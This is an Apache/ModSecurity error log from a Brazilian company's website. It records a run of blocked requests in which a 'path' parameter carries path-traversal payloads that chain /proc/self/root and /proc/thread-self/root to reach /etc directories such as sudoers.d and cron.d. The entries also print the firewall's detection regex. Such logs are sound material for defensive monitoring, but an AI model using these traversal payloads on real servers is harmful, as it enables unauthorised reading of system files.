[Mon Mar 16 18:17:32.258758 2026] [:error] [pid 29802:tid 140411574073088] [client 74.7.241.46:36050] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzbM_BxrYCr4hPDw8HNAAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:33.464720 2026] [:error] [pid 21806:tid 140411599251200] [client 74.7.241.46:36062] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzbdSswJuvopo3lOh9uQAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:34.769700 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:36078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzbrABkC4fWIHEf8EU2wAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:38.087179 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:36090] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzcv9ocpUE4ed4uDwQnAAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:39.419531 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.241.46:49906] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzc0r9dMAiw-8KANNl3wAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:40.588505 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:49920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzdLABkC4fWIHEf8EU3QAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:41.883053 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.241.46:49922] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzdaTCbgAP5jq5TehIdgAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:43.028120 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:49930] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzd9SswJuvopo3lOh9wAAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:44.428473 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.241.46:49946] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzeM_BxrYCr4hPDw8HNwAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:45.567486 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:49962] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzef9ocpUE4ed4uDwQnQAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:46.903194 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.241.46:49966] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzetSswJuvopo3lOh9wQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:48.124132 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:49492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzfKQpVkWug9HeOt9QgQAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:49.353926 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:49494] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzfY6lpbStxTqkSkuGDQAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:50.685814 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:49496] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzfv9ocpUE4ed4uDwQnwAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:52.007791 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:49508] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzgI6lpbStxTqkSkuGDgAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:53.901660 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.241.46:49524] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzgaQpVkWug9HeOt9QhAAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:55.063469 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.243.203:58418] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzg8_BxrYCr4hPDw8HOwAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:55.272520 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:49538] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzg9SswJuvopo3lOh9wgAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:56.431275 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:49540] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzhLABkC4fWIHEf8EU4gAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:57.748842 2026] [:error] [pid 15568:tid 140411632822016] [client 74.7.241.46:49552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzhaQpVkWug9HeOt9QhQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:17:58.938371 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:53934] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzhrysWC90G-1nBrBhiAAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:00.300385 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:53940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhziKQpVkWug9HeOt9QhgAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
